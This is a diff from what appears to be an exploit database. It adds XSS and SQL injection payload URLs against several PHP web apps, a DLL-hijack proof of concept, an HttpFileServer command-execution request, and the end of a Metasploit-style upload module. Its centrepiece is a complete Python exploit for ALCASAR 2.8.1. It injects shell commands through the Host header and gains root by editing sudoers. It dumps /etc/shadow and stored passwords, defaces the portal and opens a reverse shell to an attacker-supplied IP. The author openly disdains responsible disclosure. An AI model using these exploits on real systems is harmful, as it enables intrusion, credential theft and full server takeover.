ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
|
||||
ear_file.add_file(war_app_base + ".war", war_payload.to_s)
|
||||
ear_file.add_file("META-INF/application.xml", app_xml)
|
||||
ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + ".ear"
|
||||
|
||||
if not create_zip_and_upload(ear_file.pack, target_dir + ear_file_name)
|
||||
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...")
|
||||
sleep(datastore['SLEEP'])
|
||||
return normalize_uri(ear_app_base, war_app_base, rand_text_alphanumeric(4 + rand(32 - 4)))
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
if datastore['SLEEP'] < 0
|
||||
print_error("The SLEEP datastore option shouldn't be negative")
|
||||
return
|
||||
end
|
||||
|
||||
@my_target = pick_target
|
||||
if @my_target.nil?
|
||||
print_error("#{peer} - Unable to select a target, we must bail.")
|
||||
return
|
||||
else
|
||||
print_status("#{peer} - Selected target #{@my_target.name}")
|
||||
end
|
||||
|
||||
if @my_target == targets[1]
|
||||
exploit_path = exploit_java
|
||||
else
|
||||
exploit_path = exploit_native
|
||||
end
|
||||
|
||||
print_status("#{peer} - Executing payload...")
|
||||
send_request_cgi({
|
||||
'uri' => normalize_uri(exploit_path),
|
||||
'method' => 'GET'
|
||||
})
|
||||
end
|
||||
end
|
9
platforms/php/webapps/34649.txt
Executable file
9
platforms/php/webapps/34649.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/43290/info
|
||||
|
||||
Netautor Professional is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Netautor Professional 5.5.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/netautor/napro4/home/login2.php?goback=%22%3Cscript%3Ealert%28document.location%29%3C/script%3E
|
9
platforms/php/webapps/34650.txt
Executable file
9
platforms/php/webapps/34650.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/43297/info
|
||||
|
||||
e-Soft24 Flash Games Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
e-Soft24 Flash Games Script 1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/search_results.php?search_id='"><SCRIPT>alert(String.fromCharCode(88%2C83%2C83))<%2FSCRIPT><MARQUEE+BGCOLOR%3D"RED"><H1>Xss<%2FH1><%2FMARQUEE>&search=Search
|
14
platforms/php/webapps/34651.txt
Executable file
14
platforms/php/webapps/34651.txt
Executable file
|
@ -0,0 +1,14 @@
|
|||
source: http://www.securityfocus.com/bid/43303/info
|
||||
|
||||
e-Soft24 Jokes Portal Script Seo is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
e-Soft24 Jokes Portal Script Seo 1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/SearchAction.php?what='"><SCRIPT>alert(String.fromCharCode(88%2C83%2C83))<%2FSCRIPT><MARQUEE+BGCOLOR%3D"RED"><H1>Xss<%2FH1><%2FMARQUEE>&ssub=GO
|
||||
|
||||
http://www.example.com/forgot.html => put : '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><MARQUEE BGCOLOR="RED"><H1>Xss</H1></MARQUEE>
|
||||
|
||||
http://www.example.com/scripts/jokes-portal/SearchAction.php?what=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&ssub=GO
|
||||
|
14
platforms/php/webapps/34652.txt
Executable file
14
platforms/php/webapps/34652.txt
Executable file
|
@ -0,0 +1,14 @@
|
|||
source: http://www.securityfocus.com/bid/43305/info
|
||||
|
||||
e-Soft24 PTC Script is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
e-Soft24 PTC Script 1.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/login.php
|
||||
|
||||
1/ Connect you with : '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><MARQUEE BGCOLOR="RED"><H1>Xss</H1></MARQUEE>
|
||||
|
||||
2/ Password Forget : '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><MARQUEE BGCOLOR="RED"><H1>Xss</H1></MARQUEE>
|
||||
|
11
platforms/php/webapps/34653.txt
Executable file
11
platforms/php/webapps/34653.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/43327/info
|
||||
|
||||
e107 is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
e107 0.7.23 is vulnerable; other versions may also be affected.
|
||||
|
||||
|
||||
http://www.example.com/e107_admin/download.php?cat.edit.999999%0Aunion%0Aselect%0A1,2,3,4,5,6,7
|
||||
http://www.example.com/e107_admin/wmessage.php?create.edit.999999%0Aunion%0Aselect%0A1,2,user%28%29
|
9
platforms/php/webapps/34655.txt
Executable file
9
platforms/php/webapps/34655.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/43335/info
|
||||
|
||||
Open Classifieds is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/buy.php/?page=1>'><ScRiPt %0A%0D>alert(317235523215)%3B</ScRiPt>
|
||||
http://www.example.com/contact.php?id=1<ScRiPt %0A%0D>alert(345135841734)%3B</ScRiPt>
|
||||
http://www.example.com/tellafriend.php?id=1>"><ScRiPt %0A%0D>alert(366396570535)%3B</ScRiPt>
|
9
platforms/php/webapps/34656.txt
Executable file
9
platforms/php/webapps/34656.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/43336/info
|
||||
|
||||
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/includes/video_ad.php?pic_id=[XSS]
|
9
platforms/php/webapps/34657.txt
Executable file
9
platforms/php/webapps/34657.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/43336/info
|
||||
|
||||
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/linkvideos_listing.php?category=[XSS]
|
9
platforms/php/webapps/34658.txt
Executable file
9
platforms/php/webapps/34658.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/43336/info
|
||||
|
||||
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/templates/header1.php?id=[XSS]
|
9
platforms/php/webapps/34659.txt
Executable file
9
platforms/php/webapps/34659.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/43336/info
|
||||
|
||||
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/video_listing.php?category=[NB]&sort=[NB]&key=[XSS]
|
9
platforms/php/webapps/34660.txt
Executable file
9
platforms/php/webapps/34660.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/43336/info
|
||||
|
||||
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/embed.php?name="><script>alert(document.cookie);</script>
|
9
platforms/php/webapps/34661.txt
Executable file
9
platforms/php/webapps/34661.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/43336/info
|
||||
|
||||
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/info.php?name="><script>alert(document.cookie);</script>
|
9
platforms/php/webapps/34662.txt
Executable file
9
platforms/php/webapps/34662.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/43336/info
|
||||
|
||||
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/lyrics.php?id="><script>alert(document.cookie);</script>
|
9
platforms/php/webapps/34663.txt
Executable file
9
platforms/php/webapps/34663.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/43336/info
|
||||
|
||||
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/adult/video_listing.php?category=42&sort=2&key="><script>alert(document.cookie);</script>
|
229
platforms/php/webapps/34666.py
Executable file
229
platforms/php/webapps/34666.py
Executable file
|
@ -0,0 +1,229 @@
|
|||
#!/usr/bin/env python
|
||||
# -*- coding: utf-8 -*-
|
||||
#
|
||||
####
|
||||
#
|
||||
# ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability
|
||||
#
|
||||
# Author: eF
|
||||
# Date : 2014-09-12
|
||||
# URL : http://www.alcasar.net/
|
||||
#
|
||||
# This is not a responsible disclosure coz' I have no sense of ethics and I don't give a f*ck.
|
||||
#
|
||||
# db 88 ,ad8888ba, db ad88888ba db 88888888ba
|
||||
# d88b 88 d8"' `"8b d88b d8" "8b d88b 88 "8b
|
||||
# d8'`8b 88 d8' d8'`8b Y8, d8'`8b 88 ,8P
|
||||
# d8' `8b 88 88 d8' `8b `Y8aaaaa, d8' `8b 88aaaaaa8P'
|
||||
# d8YaaaaY8b 88 88 d8YaaaaY8b `"""""8b, d8YaaaaY8b 88""""88'
|
||||
# d8""""""""8b 88 Y8, d8""""""""8b `8b d8""""""""8b 88 `8b
|
||||
# d8' `8b 88 Y8a. .a8P d8' `8b Y8a a8P d8' `8b 88 `8b
|
||||
# d8' `8b 88888888888 `"Y8888Y"' d8' `8b "Y88888P" d8' `8b 88 `8b
|
||||
#
|
||||
#
|
||||
# ALCASAR is a free Network Access Controller which controls the Internet consultation networks.
|
||||
# It authenticates, attributes and protects users' access regardless their connected equipment
|
||||
# (PC, smartphone, game console, etc.).
|
||||
#
|
||||
# I recently released an exploit for ALCASAR 2.8 (ALCASAR <= 2.8 Remote Code Execution Vulnerability Root).
|
||||
# As a reminder, it was a trivial code execution via a unfiltered exec() call:
|
||||
#
|
||||
# $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
|
||||
# exec("grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut -d'/' -f6", $output);
|
||||
#
|
||||
# A few days later, a new version corrects the vulnerability. Or maybe not...
|
||||
#
|
||||
# At first, this is how ALCASAR's developers present the previous vulnerability:
|
||||
#
|
||||
# " A security hole has been discovered on ALCASAR V2.8 (only this version). This vulnerability allows a user "
|
||||
# " connected on the LAN to retrieve a lot of data from the server. The ALCASAR team is testing few security "
|
||||
# " patches. A script that you could run on the active servers will be available on this forum ASAP. At that "
|
||||
# " time, the download version of ALCASAR will be incremented (V2.8.1) "
|
||||
#
|
||||
# ?!? This vulnerability allows a user connected on the LAN to *TOTALLY PWN* the server:
|
||||
# Get a root shell, stop all services, sniff all connections, inject data in users' sessions, sniff passwords,
|
||||
# bypass firewall rules, act as another user, etc.
|
||||
# This is not just a matter of "retrieving a lot of data from the server".
|
||||
#
|
||||
# Not to alert users of real criticality of a vulnerability is a very serious lack of security.
|
||||
# Lying by saying that the vulnerability only affects version 2.8 while it also affects version 2.7 is another
|
||||
# one.
|
||||
#
|
||||
# Now, the patch itself: it tries to correct the vulnerability by filtering the vulnerable input:
|
||||
#
|
||||
# $pattern = filter_var($pattern, FILTER_VALIDATE_URL) == false ? "" : $pattern;
|
||||
#
|
||||
# WTF?!
|
||||
# First, I think that the application no longer works. By default, filter_var() is going to accept an URL
|
||||
# only if its scheme is valid:
|
||||
#
|
||||
# $ php -r 'var_dump(filter_var("www.google.com", FILTER_VALIDATE_URL));'
|
||||
# bool(false)
|
||||
# $ php -r 'var_dump(filter_var("http://www.google.com", FILTER_VALIDATE_URL));'
|
||||
# string(21) "http://www.google.com"
|
||||
#
|
||||
# But... we cannot put http:// in the HTTP host field, the HTTP server won't let us...
|
||||
# Dev, did you try your patch?
|
||||
# Instead, to execute code, it's quite easy to bypass this filtering using "mailto:email@valid.tld;cmd;"
|
||||
# Service down, vulnerability still present: double fail.
|
||||
#
|
||||
# The privilege escalation in the previous exploit was using openssl, to gain reading and writing rights
|
||||
# as root.
|
||||
#
|
||||
# The patch therefore removes openssl in the sudoers file (without changing the legitimate
|
||||
# calls in the PHP code...). So let's use another method: systemctl is still callable via sudo...
|
||||
#
|
||||
# We can create a service with our command and start it as root:
|
||||
#
|
||||
# sudo systemctl link /tmp/pwn3d.service
|
||||
# sudo systemctl start pwn3d.service
|
||||
#
|
||||
# Conclusion: triple fail.
|
||||
#
|
||||
# Wouldn't a "responsable de la sécurité des systèmes d'information d'un grand commandement" need a
|
||||
# little training on secure PHP development?
|
||||
#
|
||||
# On ALCASAR website:
|
||||
#
|
||||
# "The security of the portal has been worked out like a bastion in order to resist to different
|
||||
# kinds of threat"
|
||||
#
|
||||
# LOLZ!!! Remote Root Code Execution does not seem to be part of these "different kinds of threat".
|
||||
#
|
||||
# ALCASAR is not built with security in mind. Apache user can sudo, there is no chroot, no separation,
|
||||
# the PHP code is dreadful, some passwords are unnecessarily stored in plaintext, the function to
|
||||
# generate user password is weak, there are no system updates (kernel is out to date, from Jul 4 2013),
|
||||
# etc.
|
||||
#
|
||||
# Development is not really open either: there is no bugtracker, no trac, no way to see what has been
|
||||
# patched, etc. If the elementary rules of open source development had been met, a user could have
|
||||
# prevented this 2.8.1 patch from being crap.
|
||||
#
|
||||
#
|
||||
####
|
||||
|
||||
import sys, os, re, httplib
|
||||
|
||||
class PWN_Alcasar:
|
||||
|
||||
def __init__(self, host):
|
||||
self.host = host
|
||||
self.root = False
|
||||
|
||||
def exec_cmd(self, cmd, output=False):
|
||||
tag = os.urandom(4).encode('hex')
|
||||
|
||||
cmd = 'bash -c "%s" 2>&1' % cmd.replace('"', '\\"')
|
||||
if self.root:
|
||||
cmd = 'sudo %s' % cmd
|
||||
|
||||
wrapper = 'echo %s;echo %s|base64 -d -w0|sh|base64 -w0' % (tag, cmd.encode('base64').replace('\n',''))
|
||||
wrapper = wrapper.replace(' ', '${IFS}')
|
||||
headers = {
|
||||
'host' : 'mailto:eF@cosmic.nato;%s;#' % wrapper
|
||||
}
|
||||
|
||||
c = httplib.HTTPConnection(self.host)
|
||||
c.request('GET', '/index.php', '', headers)
|
||||
r = c.getresponse()
|
||||
data = r.read()
|
||||
c.close()
|
||||
|
||||
m = re.search(r'%s, (.*)\s</div>' % tag, data)
|
||||
if m:
|
||||
data = m.group(1).decode('base64')
|
||||
if output:
|
||||
print data
|
||||
return data
|
||||
return None
|
||||
|
||||
def read_file(self, filepath, output=True):
|
||||
return self.exec_cmd('cat "%s"' % filepath, output=output)
|
||||
|
||||
def read_passwords(self):
|
||||
self.read_file('/root/ALCASAR-passwords.txt')
|
||||
self.read_file('/etc/shadow')
|
||||
self.read_file('/usr/local/etc/digest/key_all')
|
||||
self.read_file('/usr/local/etc/digest/key_admin')
|
||||
self.read_file('/usr/local/etc/digest/key_backup')
|
||||
self.read_file('/usr/local/etc/digest/key_manager')
|
||||
self.read_file('/usr/local/etc/digest/key_only_admin')
|
||||
self.read_file('/usr/local/etc/digest/key_only_backup')
|
||||
self.read_file('/usr/local/etc/digest/key_only_manager')
|
||||
alcasar_mysql = self.read_file('/usr/local/sbin/alcasar-mysql.sh', output=False)
|
||||
if alcasar_mysql:
|
||||
m = re.search(r'radiuspwd="(.*)"', alcasar_mysql)
|
||||
if m:
|
||||
radiuspwd = m.group(1)
|
||||
sql = 'SELECT username,value FROM radcheck WHERE attribute like \'%%password%%\''
|
||||
self.exec_cmd('mysql -uradius -p\"%s\" radius -e "%s"' % (radiuspwd, sql), output=True)
|
||||
|
||||
def edit_sudoers(self):
|
||||
service = '[Unit]\n'
|
||||
service += 'Description=Just another ALCASAR lolcalr00t\n\n'
|
||||
service += '[Service]\n'
|
||||
service += 'Type=forking\n'
|
||||
service += 'KillMode=process\n'
|
||||
service += 'ExecStart=/bin/sh -c "sed -i s/BL,NF/BL,ALL,NF/g /etc/sudoers"\n'
|
||||
self.exec_cmd('echo %s | openssl base64 -d -out /tmp/Pwn3d.service -A' % service.encode('base64').replace('\n', ''))
|
||||
self.exec_cmd('sudo systemctl link /tmp/Pwn3d.service')
|
||||
self.exec_cmd('sudo systemctl start Pwn3d.service')
|
||||
if exploit.exec_cmd('sudo id').find('uid=0') != -1:
|
||||
self.root = True
|
||||
|
||||
def reverse_shell(self, rip, rport='80'):
|
||||
payload = 'import socket,subprocess,os;'
|
||||
payload += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
|
||||
payload += 's.connect((\'%s\',%s));' % (rip, rport)
|
||||
payload += 'os.dup2(s.fileno(),0);'
|
||||
payload += 'os.dup2(s.fileno(),1);'
|
||||
payload += 'os.dup2(s.fileno(),2);'
|
||||
payload += 'p=subprocess.call([\'/bin/sh\',\'-i\']);'
|
||||
return self.exec_cmd('python -c "%s"' % payload)
|
||||
|
||||
def lolz(self):
|
||||
old = 'http://www.wikipedia.org'
|
||||
new = 'https://www.youtube.com/watch\?v=Q-J0f1yF75Y'
|
||||
self.exec_cmd('sed -i s,%s,%s,g /var/www/html/index.php' % (old, new), True)
|
||||
|
||||
def usage():
|
||||
print 'Usage: %s host command (ip) (port)' % sys.argv[0]
|
||||
print ' "command" can be a shell command or "reverseshell"'
|
||||
sys.exit(0)
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
print '#' * 80
|
||||
print '# ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability'
|
||||
print '# Author: eF'
|
||||
print '#' * 80
|
||||
|
||||
if len(sys.argv) < 3:
|
||||
usage()
|
||||
|
||||
cmd = sys.argv[2]
|
||||
if cmd == 'reverseshell':
|
||||
if len(sys.argv) < 5:
|
||||
print '[!] Need IP and port for the reverse shell...'
|
||||
sys.exit(0)
|
||||
rip = sys.argv[3]
|
||||
rport = sys.argv[4]
|
||||
|
||||
exploit = PWN_Alcasar(sys.argv[1])
|
||||
print '[-] whoami (should be apache):'
|
||||
exploit.exec_cmd('id', output=True)
|
||||
print '[+] On the way to the uid 0...'
|
||||
exploit.edit_sudoers()
|
||||
print '[-] Got root?'
|
||||
exploit.exec_cmd('id', output=True)
|
||||
exploit.lolz()
|
||||
if exploit.root:
|
||||
print '[+] Here are some passwords for you (again):'
|
||||
exploit.read_passwords()
|
||||
if cmd == 'reverseshell':
|
||||
print '[+] You should now have a shell on %s:%s' % (rip, rport)
|
||||
exploit.reverse_shell(rip, rport)
|
||||
else:
|
||||
print '[+] Your command Sir:'
|
||||
exploit.exec_cmd(cmd, output=True)
|
||||
sys.exit(1)
|
43
platforms/windows/remote/34654.c
Executable file
43
platforms/windows/remote/34654.c
Executable file
|
@ -0,0 +1,43 @@
|
|||
source: http://www.securityfocus.com/bid/43332/info
|
||||
|
||||
SWiSH Max3 is prone to a vulnerability that lets attackers execute arbitrary code.
|
||||
|
||||
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
|
||||
|
||||
SWiSH Max3 is vulnerable; other versions may also be affected.
|
||||
|
||||
/*
|
||||
#SWiSHmax DLL Hijacking Exploit (swishmaxres.dll)
|
||||
#Author : anT!-Tr0J4n
|
||||
#Greetz : Dev-PoinT.com $ GlaDiatOr $ SILVER STAR $ Coffin Of Evil $ HoBeeZ $ Mr.Mh$TEr $ ?Own3d $ Cyber-Err0r $ Nashy $ all My Friends
|
||||
#contact: D3v-PoinT@hotmail.com & C1EH@Hotmail.com
|
||||
#Tested on: Windows XP sp3
|
||||
|
||||
#How to use : Place a .swi file and swishmaxres.dll in same folder and execute .swi file in
|
||||
|
||||
#swishmaxres.dll (code)
|
||||
*/
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
void init() {
|
||||
MessageBox(NULL,"anT!-Tr0J4n", "Hack3d",0x00000003);
|
||||
}
|
||||
|
||||
|
||||
BOOL APIENTRY DllMain( HANDLE hModule,
|
||||
DWORD ul_reason_for_call,
|
||||
LPVOID lpReserved
|
||||
)
|
||||
{
|
||||
switch (ul_reason_for_call)
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
init();break;
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
case DLL_PROCESS_DETACH:
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
25
platforms/windows/remote/34668.txt
Executable file
25
platforms/windows/remote/34668.txt
Executable file
|
@ -0,0 +1,25 @@
|
|||
Affected software: http://sourceforge.net/projects/hfs/
|
||||
Version : 2.3x
|
||||
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
|
||||
# Google Dork: intext:"httpfileserver 2.3"
|
||||
# Date: 11-09-2014
|
||||
# Remote: Yes
|
||||
# Exploit Author: Daniele Linguaglossa
|
||||
# Vendor Homepage: http://rejetto.com/
|
||||
# Software Link: http://sourceforge.net/projects/hfs/
|
||||
# Version: 2.3.x
|
||||
# Tested on: Windows Server 2008 , Windows 8, Windows 7
|
||||
# CVE : CVE-2014-6287
|
||||
|
||||
issue exists due to a poor regex in the file ParserLib.pas
|
||||
|
||||
|
||||
function findMacroMarker(s:string; ofs:integer=1):integer;
|
||||
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
|
||||
|
||||
|
||||
it will not handle null byte so a request to
|
||||
|
||||
http://localhost:80/search=%00{.exec|cmd.}
|
||||
|
||||
will stop regex from parse macro , and macro will be executed and remote code injection happen.
|
Loading…
Add table
Reference in a new issue